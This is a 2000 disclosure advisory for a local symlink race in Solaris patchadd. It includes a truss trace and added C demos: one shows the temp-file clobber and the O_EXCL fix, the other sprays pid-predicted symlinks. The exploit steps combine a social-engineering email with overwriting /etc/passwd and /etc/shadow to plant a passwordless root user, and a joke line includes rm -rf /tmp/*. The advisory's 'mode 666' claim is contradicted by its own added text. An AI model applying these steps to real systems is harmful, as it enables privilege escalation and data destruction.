Solaris patchadd symlink vulnerability
Released by: Jonathan Fortin
Date: 19th December 2000
I was playing around with patchadd and found the bug when I issued
"truss -f -o patch.log patchadd patch", where patch was a tarball. patchadd
emitted an error because it was a tarball, and when I went through the debug
output I found a serious race condition vulnerability.
Line Pid exec call
105: 12869: open64("/tmp/sh12869.1", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
136: 12869: open64("/tmp/sh12869.2", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
481: 12869: open64("/tmp/sh12869.3", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
file "/tmp/sh12869.1":
105: 12869: open64("/tmp/sh12869.1", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
106: 12869: write(3, "\n U s a g e : p a t c".., 482) = 482
107: 12869: close(3)
file "/tmp/sh12869.2":
136: 12869: open64("/tmp/sh12869.2", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
137: 12869: write(3, " m a i l =\n i n s t a n".., 145) = 145
138: 12869: close(3)
file "/tmp/sh12869.3":
481: 12869: open64("/tmp/sh12869.3", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
482: 12869: close(61) Err#9 EBADF
483: 12869: fcntl(3, F_DUPFD, 0x0000003D) = 61
484: 12869: close(3)
Class: Race condition
Remote: no
Local: yes
Vulnerable: I only checked Solaris 2.7 SPARC with the latest install_cluster
installed.
Discussion:
When patchadd runs it creates three temporary files, "/tmp/sh<pid>.1",
"/tmp/sh<pid>.2" and "/tmp/sh<pid>.3", where <pid> is patchadd's own process
id (12869 in the trace above). Each is opened with O_RDWR|O_CREAT|O_TRUNC and
mode 0666, receives fragments of patchadd's own shell script (the usage text,
variable settings) and is unlinked on exit. The names are predictable and the
open does not use O_EXCL, so a symbolic link already sitting at that path is
followed. An attacker who predicts the pid the next patchadd run will get, or
who plants a few hundred symlinks covering a range of upcoming pids, can point
each name at a key system file; when another user (normally root) runs
patchadd, the target of each link is truncated and overwritten with patchadd's
temporary script contents. Up to three files can be hit per run, one per
temporary name. Note that the 0666 mode is applied only when open() creates a
new file (and is then reduced by the caller's umask); open() does not change
the mode of an existing target. A link pointing at an existing file therefore
gets that file truncated and overwritten, and a link pointing at a path that
does not yet exist gets a new file created there, owned by whoever ran
patchadd. Either way a local user gets to corrupt or create files he could not
otherwise touch, which can lead to privilege escalation and compromise of the
host.
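The following C program is an added example and is not part of the advisory or of patchadd itself. It reproduces the open64() flags seen in the truss output against a planted symlink and shows the O_EXCL fix beside it. Everything else in it is constructed for the demonstration: the scratch directory under /tmp, the "victim" file and its one-line contents, and the short stand-in for patchadd's 482-byte usage text. The link is planted in a private, non-sticky directory rather than in /tmp itself so that Linux's fs.protected_symlinks does not mask the behaviour being shown.

```c
#define _XOPEN_SOURCE 700          /* POSIX declarations: symlink(), fchmod(), ... */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed victim content; a real target would be e.g. /etc/passwd. */
static const char ORIG[] = "root:x:0:0:Super-User:/:/sbin/sh\n";

/* The open64() call seen in the trace: O_CREAT|O_TRUNC, no O_EXCL, mode 0666.
 * If `path` is a symlink, the kernel follows it and truncates the target. */
static int open_like_patchadd(const char *path) {
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0666);
}

/* The fix: O_EXCL makes the create fail with EEXIST when anything, a symlink
 * included, already sits at `path`; 0600 keeps the temp file private. */
static int open_hardened(const char *path) {
    return open(path, O_RDWR | O_CREAT | O_EXCL, 0600);
}

/* Make a private scratch dir, a victim file (mode 0644, known content) and a
 * link named like patchadd's first temp file pointing at the victim. */
static int plant(char *dir, char *victim, char *link, size_t cap) {
    snprintf(dir, cap, "/tmp/padd-demo-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0 && errno != EEXIST) return -1;
    snprintf(victim, cap, "%s/victim", dir);
    snprintf(link, cap, "%s/sh12869.1", dir);   /* pid copied from the truss log */
    unlink(link); unlink(victim);               /* clear leftovers from a prior run */
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) return -1;
    fchmod(fd, 0644);                           /* pin the mode regardless of umask */
    ssize_t n = write(fd, ORIG, sizeof ORIG - 1);
    close(fd);
    if (n != (ssize_t)(sizeof ORIG - 1)) return -1;
    return symlink(victim, link);
}

static void cleanup(const char *dir, const char *victim, const char *link) {
    unlink(link); unlink(victim); rmdir(dir);
}

/* Returns 1 if the patchadd-style open followed the link, truncated the victim
 * and replaced its content, while leaving its mode at 0644: open() never changes
 * the mode of an existing file, so the target does not "become 666". */
int unsafe_open_clobbers_target(void) {
    char dir[256], victim[256], link[256], buf[256] = {0};
    struct stat st;
    const char *junk = "\nUsage: patchadd [options] patch\n"; /* stands in for the usage text */
    if (plant(dir, victim, link, sizeof dir) < 0) return 0;
    int ok = 0, fd = open_like_patchadd(link);
    if (fd >= 0) {
        ok = write(fd, junk, strlen(junk)) == (ssize_t)strlen(junk);
        close(fd);
    }
    if ((fd = open(victim, O_RDONLY)) >= 0) {
        ok = ok && read(fd, buf, sizeof buf - 1) == (ssize_t)strlen(junk);
        close(fd);
    } else {
        ok = 0;
    }
    ok = ok && stat(victim, &st) == 0 && (st.st_mode & 0777) == 0644
            && strcmp(buf, junk) == 0;
    cleanup(dir, victim, link);
    return ok;
}

/* Returns 1 if the hardened open refuses the planted link with EEXIST and the
 * victim's original content survives untouched. */
int hardened_open_refuses_symlink(void) {
    char dir[256], victim[256], link[256];
    struct stat st;
    if (plant(dir, victim, link, sizeof dir) < 0) return 0;
    int fd = open_hardened(link);
    int refused = fd < 0 && errno == EEXIST;
    if (fd >= 0) close(fd);
    int intact = stat(victim, &st) == 0 && st.st_size == (off_t)(sizeof ORIG - 1);
    cleanup(dir, victim, link);
    return refused && intact;
}

int main(void) {
    printf("patchadd-style open clobbered the target: %s\n",
           unsafe_open_clobbers_target() ? "yes" : "no");
    printf("O_EXCL open refused the planted symlink:  %s\n",
           hardened_open_refuses_symlink() ? "yes" : "no");
    return 0;
}
```

Compile with `cc -o padd-demo padd-demo.c` and run it as an unprivileged user; both lines should print "yes". The first function also records the point the advisory gets wrong: after the clobber the victim is still mode 0644, so what the attacker controls is the truncation and the overwritten content, not the permission bits.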
Exploit:
1. Email the admin telling him there is a new patch out that needs to be
installed.
2. Write a Perl/C script that: copies /etc/passwd and /etc/shadow to hidden
files, to be appended back to /etc/passwd and /etc/shadow later; finds the
next available pid; creates two symlinks, named like patchadd's temporary
files for that pid, pointing at /etc/passwd and /etc/shadow; once that pid
has been taken, stats /etc/passwd and /etc/shadow to see whether they are
mode 666, and if not starts over; when they are, appends a uid 0 user with no
password to the hidden files, appends the hidden files to the now truncated
/etc/passwd and /etc/shadow, and emails you to log in and take advantage.
3. su trojaned_user
4. #
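The pid-prediction and symlink-spray part of step 2, as an added C example that is not from the advisory. It samples the pid counter by forking a short-lived child, then plants "sh<pid>.1" to ".3" links for a run of upcoming pids. The scratch directory and the target path are constructed for the demonstration (the target is never opened, and nothing is planted in the real /tmp root); a real attacker would use /tmp and a system file as the target, as the text describes.

```c
#define _XOPEN_SOURCE 700          /* POSIX declarations: symlink(), readlink(), ... */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Sample the pid counter: fork a child that exits at once and return its pid.
 * On a kernel that hands out pids sequentially the next processes land just
 * above this value; on one that randomises pids it is only a guess, hence the
 * advisory's suggestion of spraying a few hundred candidates. */
pid_t sample_pid(void) {
    pid_t p = fork();
    if (p == 0) _exit(0);
    if (p > 0) waitpid(p, NULL, 0);
    return p;
}

/* Plant "<dir>/sh<pid>.1", ".2", ".3" -> target for `count` consecutive pids
 * starting at `first`: the names patchadd opens with O_CREAT|O_TRUNC.
 * Returns the number of links created. */
int spray_links(const char *dir, const char *target, pid_t first, int count) {
    char path[512];
    int made = 0;
    for (int i = 0; i < count; i++)
        for (int n = 1; n <= 3; n++) {
            snprintf(path, sizeof path, "%s/sh%ld.%d", dir, (long)first + i, n);
            if (symlink(target, path) == 0) made++;
        }
    return made;
}

/* Remove what spray_links planted; returns the number of links removed. */
int unspray_links(const char *dir, pid_t first, int count) {
    char path[512];
    int removed = 0;
    for (int i = 0; i < count; i++)
        for (int n = 1; n <= 3; n++) {
            snprintf(path, sizeof path, "%s/sh%ld.%d", dir, (long)first + i, n);
            if (unlink(path) == 0) removed++;
        }
    return removed;
}

/* Self-contained run: sprays `count` pids into a constructed scratch directory,
 * checks that one planted link reads back as pointing at the constructed
 * target, then removes everything. Returns the number of links created
 * (3 per pid), or -1 on failure. */
int demo_spray(int count) {
    char dir[64], probe[512], got[512];
    const char *target = "/nonexistent/demo-target";   /* constructed; never opened */
    snprintf(dir, sizeof dir, "/tmp/spray-demo-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0 && errno != EEXIST) return -1;
    pid_t first = sample_pid() + 1;                   /* next pid we expect to see */
    int made = spray_links(dir, target, first, count);
    snprintf(probe, sizeof probe, "%s/sh%ld.2", dir, (long)first);
    ssize_t len = readlink(probe, got, sizeof got - 1);
    int points_right = 0;
    if (len > 0) {
        got[len] = '\0';
        points_right = strcmp(got, target) == 0;
    }
    unspray_links(dir, first, count);
    rmdir(dir);
    return points_right ? made : -1;
}

int main(void) {
    printf("planted and removed %d links\n", demo_spray(200));
    return 0;
}
```

Whether the sprayed range actually covers patchadd's pid depends on how many other processes start in between, which is why the advisory talks of a few hundred links rather than one.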
Solutions:
None that I can think of. Setting $TMPDIR didn't work, and chroot won't work
because you're applying patches to your current root, unless you want to
cp -rp them to your real root afterwards, but that would be shitty.
hrm.. :<
The only solution is to rm -rf /tmp/* /tmp/.*, pull the twisted-pair cables
out of the box, make sure no users are logged on, make sure there are no
cron/at jobs running as third-party users, and then invoke patchadd :)
(I'm trying to be funny)
Thank you
Sincerely,
Jonathan Fortin
*************************************
* Jonathan Fortin, Unix Engineer *
* Company: Revelex Corporation *
* Email: jfortin@revelex.com *
* Mobile: 514-244-6208 *
* Tel: 514-938-8405 *
*************************************